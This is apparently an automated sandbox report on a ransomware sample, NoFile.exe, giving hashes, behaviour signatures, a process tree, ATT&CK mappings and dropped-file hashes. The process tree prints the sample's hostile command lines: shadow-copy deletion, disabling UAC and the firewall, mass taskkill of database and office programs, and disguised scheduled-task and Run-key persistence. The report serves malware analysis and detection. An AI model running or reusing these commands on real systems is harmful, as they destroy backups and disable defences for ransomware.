Resubmissions

06-02-2022 09:21

220206-lbgarshbe9 10

06-02-2022 09:18

220206-k9rcyshcfn 10

Analysis

  • max time kernel
    151s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    06-02-2022 09:18

General

  • Target

    NoFile.exe

  • Size

    2.2MB

  • MD5

    7d1ed67b77f47ba8aadf9a3ac7d0c371

  • SHA1

    a598e6708c189caeef1fa76064feb4d0155abb3d

  • SHA256

    87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae

  • SHA512

    17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9

Malware Config

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 10 IoCs
  • Enumerates processes with tasklist 1 TTPs 11 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 40 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NoFile.exe
    "C:\Users\Admin\AppData\Local\Temp\NoFile.exe"
    1⤵
    • Drops startup file
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist /v /fo csv
        3⤵
        • Enumerates processes with tasklist
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
      • C:\Windows\SysWOW64\findstr.exe
        findstr /i "dcdcf"
        3⤵
          PID:1952
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ver
        2⤵
          PID:3484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
          2⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3444
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3516
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
              4⤵
                PID:4052
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:804
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /v
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1556
                • C:\Windows\SysWOW64\find.exe
                  find /I /c "dcdcf"
                  5⤵
                    PID:3260
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 15 /nobreak
                    5⤵
                    • Delays execution with timeout.exe
                    PID:3780
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist /fi "ImageName eq NoFile.exe" /fo csv
                    5⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3532
                  • C:\Windows\SysWOW64\find.exe
                    find /I "NoFile.exe"
                    5⤵
                      PID:3888
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 15 /nobreak
                      5⤵
                      • Delays execution with timeout.exe
                      PID:1508
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist /fi "ImageName eq NoFile.exe" /fo csv
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1748
                    • C:\Windows\SysWOW64\find.exe
                      find /I "NoFile.exe"
                      5⤵
                        PID:2388
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 15 /nobreak
                        5⤵
                        • Delays execution with timeout.exe
                        PID:3388
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist /fi "ImageName eq NoFile.exe" /fo csv
                        5⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2060
                      • C:\Windows\SysWOW64\find.exe
                        find /I "NoFile.exe"
                        5⤵
                          PID:1780
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 15 /nobreak
                          5⤵
                          • Delays execution with timeout.exe
                          PID:228
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /fi "ImageName eq NoFile.exe" /fo csv
                          5⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3680
                        • C:\Windows\SysWOW64\find.exe
                          find /I "NoFile.exe"
                          5⤵
                            PID:4056
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 15 /nobreak
                            5⤵
                            • Delays execution with timeout.exe
                            PID:3084
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist /fi "ImageName eq NoFile.exe" /fo csv
                            5⤵
                            • Enumerates processes with tasklist
                            PID:2364
                          • C:\Windows\SysWOW64\find.exe
                            find /I "NoFile.exe"
                            5⤵
                              PID:2572
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 15 /nobreak
                              5⤵
                              • Delays execution with timeout.exe
                              PID:3144
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist /fi "ImageName eq NoFile.exe" /fo csv
                              5⤵
                              • Enumerates processes with tasklist
                              PID:1356
                            • C:\Windows\SysWOW64\find.exe
                              find /I "NoFile.exe"
                              5⤵
                                PID:612
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 15 /nobreak
                                5⤵
                                • Delays execution with timeout.exe
                                PID:2984
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist /fi "ImageName eq NoFile.exe" /fo csv
                                5⤵
                                • Enumerates processes with tasklist
                                PID:1588
                              • C:\Windows\SysWOW64\find.exe
                                find /I "NoFile.exe"
                                5⤵
                                  PID:1908
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 15 /nobreak
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:2868
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist /fi "ImageName eq NoFile.exe" /fo csv
                                  5⤵
                                  • Enumerates processes with tasklist
                                  PID:1932
                                • C:\Windows\SysWOW64\find.exe
                                  find /I "NoFile.exe"
                                  5⤵
                                    PID:2080
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 15 /nobreak
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:3468
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist /fi "ImageName eq NoFile.exe" /fo csv
                                    5⤵
                                    • Enumerates processes with tasklist
                                    PID:3912
                                  • C:\Windows\SysWOW64\find.exe
                                    find /I "NoFile.exe"
                                    5⤵
                                      PID:3516
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 15 /nobreak
                                      5⤵
                                      • Delays execution with timeout.exe
                                      PID:3500
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3888
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:1276
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:536
                                • C:\Windows\SysWOW64\nslookup.exe
                                  nslookup myip.opendns.com. resolver1.opendns.com
                                  3⤵
                                    PID:2868
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                  2⤵
                                    PID:3912
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2628
                                    • C:\Windows\SysWOW64\systeminfo.exe
                                      systeminfo
                                      3⤵
                                      • Gathers system information
                                      PID:3324
                                    • C:\Windows\SysWOW64\find.exe
                                      find /i "os name"
                                      3⤵
                                        PID:1576
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                      2⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1004
                                      • C:\Windows\SysWOW64\systeminfo.exe
                                        systeminfo
                                        3⤵
                                        • Gathers system information
                                        PID:616
                                      • C:\Windows\SysWOW64\find.exe
                                        find /i "original"
                                        3⤵
                                          PID:3796
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                        2⤵
                                          PID:1932
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                            3⤵
                                            • Modifies registry key
                                            PID:3212
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            wmic shadowcopy delete
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2172
                                          • C:\Windows\SysWOW64\netsh.exe
                                            netsh advfirewall set currentprofile state off
                                            3⤵
                                              PID:2872
                                            • C:\Windows\SysWOW64\netsh.exe
                                              netsh firewall set opmode mode=disable
                                              3⤵
                                                PID:720
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                                3⤵
                                                  PID:3692
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
                                                2⤵
                                                  PID:532
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im notepad.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3496
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im msftesql.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3076
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im sqlagent.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3008
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im sqlbrowser.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3516
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im sqlservr.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1560
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im sqlwriter.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3480
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im oracle.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:644
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im ocssd.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3004
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im dbsnmp.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3260
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im synctime.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1748
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im agntsvc.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:796
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im mydesktopqos.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2760
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im isqlplussvc.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1580
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im xfssvccon.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:3388
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im mydesktopservice.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:3584
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im ocautoupds.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2912
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im agntsvc.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2872
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im encsvc.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1276
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im firefoxconfig.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:3588
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im tbirdconfig.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2572
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im ocomm.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:312
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im mysqld.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:632
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im mysqld-nt.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1136
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im mysqld-opt.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2944
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im dbeng50.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2780
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im sqbcoreservice.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1184
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im excel.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2080
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im infopath.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2180
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im msaccess.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2968
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im mspub.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1668
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im onenote.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:3988
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im outlook.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2708
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im powerpnt.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1584
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im steam.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2148
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im thebat.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2784
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im thebat64.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1556
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im thunderbird.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:3936
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im visio.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:4068
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im winword.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:1260
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im wordpad.exe
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2064
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                  2⤵
                                                    PID:3428
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                      3⤵
                                                        PID:2428
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                        3⤵
                                                        • Modifies registry key
                                                        PID:1828
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                      2⤵
                                                        PID:720
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                          3⤵
                                                          • Adds Run key to start application
                                                          • Modifies registry key
                                                          PID:1128
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                          3⤵
                                                          • Adds Run key to start application
                                                          PID:3588
                                                    • C:\Windows\system32\MusNotifyIcon.exe
                                                      %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
                                                      1⤵
                                                      • Checks processor information in registry
                                                      PID:216
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p
                                                      1⤵
                                                      • Drops file in Windows directory
                                                      • Modifies data under HKEY_USERS
                                                      PID:3312
                                                    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                      1⤵
                                                      • Drops file in Windows directory
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:832
                                                    • C:\Windows\system32\vssvc.exe
                                                      C:\Windows\system32\vssvc.exe
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3896

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                    Execution

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Persistence

                                                    Modify Existing Service

                                                    1
                                                    T1031

                                                    Registry Run Keys / Startup Folder

                                                    1
                                                    T1060

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Privilege Escalation

                                                    Bypass User Account Control

                                                    1
                                                    T1088

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Defense Evasion

                                                    Bypass User Account Control

                                                    1
                                                    T1088

                                                    Disabling Security Tools

                                                    1
                                                    T1089

                                                    Modify Registry

                                                    3
                                                    T1112

                                                    File Deletion

                                                    1
                                                    T1107

                                                    Discovery

                                                    Query Registry

                                                    3
                                                    T1012

                                                    System Information Discovery

                                                    5
                                                    T1082

                                                    Peripheral Device Discovery

                                                    1
                                                    T1120

                                                    Process Discovery

                                                    1
                                                    T1057

                                                    Impact

                                                    Inhibit System Recovery

                                                    1
                                                    T1490

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\h4_svc.bat
                                                      MD5

                                                      ead5cad574fa019df970900e07e76afd

                                                      SHA1

                                                      2bf7be0a9b3f174eaccd0a89310699f7b15fed02

                                                      SHA256

                                                      7de41bf6be3b821fb2ff4a2f8b7f6772d407c0bdf1bccfd9c19207ab1f07440f

                                                      SHA512

                                                      16aa662012c6ed8c50cb45f0487ff10081201c0091ccd86b4ae5235e72ef696a188f9acb5f91e8a59b95cac7b5d8b1c89328f32714f51d201db94e0a0aae5c87

                                                    • C:\Users\Admin\AppData\t2_svc.bat
                                                      MD5

                                                      702f5dc6f9dec28c8c9b7b6885c9fe09

                                                      SHA1

                                                      dbb85da6de899deb21ce0a8f25c1726cd19e49e8

                                                      SHA256

                                                      20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9

                                                      SHA512

                                                      fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

                                                    • C:\Users\Admin\AppData\v9_svc.vbs
                                                      MD5

                                                      e9c50acda9063b2462697bdbd0a0dfe2

                                                      SHA1

                                                      d1a2bc54905ce0e9121f8e5c249e0527f2190b7e

                                                      SHA256

                                                      f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd

                                                      SHA512

                                                      d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9